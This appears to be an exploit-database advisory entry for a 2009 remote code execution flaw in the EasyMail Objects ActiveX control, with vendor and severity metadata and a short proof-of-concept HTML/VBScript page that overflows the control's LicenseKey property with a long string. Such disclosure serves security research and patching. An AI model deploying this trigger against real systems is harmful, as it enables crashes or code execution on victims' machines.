EasyMail Objects ActiveX Control Remote Code Execution Vulnerability

vendor:

EasyMail Objects ActiveX Control

by:

SecurityFocus

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: EasyMail Objects ActiveX Control

Affected Version From: EasyMail Objects 6.0.2.0

Affected Version To: Spam Inspector 4.0.354

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Internet Explorer

2009

EasyMail Objects ActiveX Control Remote Code Execution Vulnerability

EasyMail Objects ActiveX control is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied data. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application (typically Internet Explorer) using the ActiveX control. Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Users should avoid visiting untrusted websites and clicking on links provided by unknown or untrusted sources.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36409/info

EasyMail Objects ActiveX control is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application (typically Internet Explorer) using the ActiveX control. Failed exploit attempts likely result in denial-of-service conditions.

EasyMail Objects 6.0.2.0 is vulnerable; other versions may also be affected.
Spam Inspector 4.0.354 is vulnerable.

<HTML> <object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object> <script language = 'vbscript'> Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") code = Scrap target.LicenseKey = code </script> <html>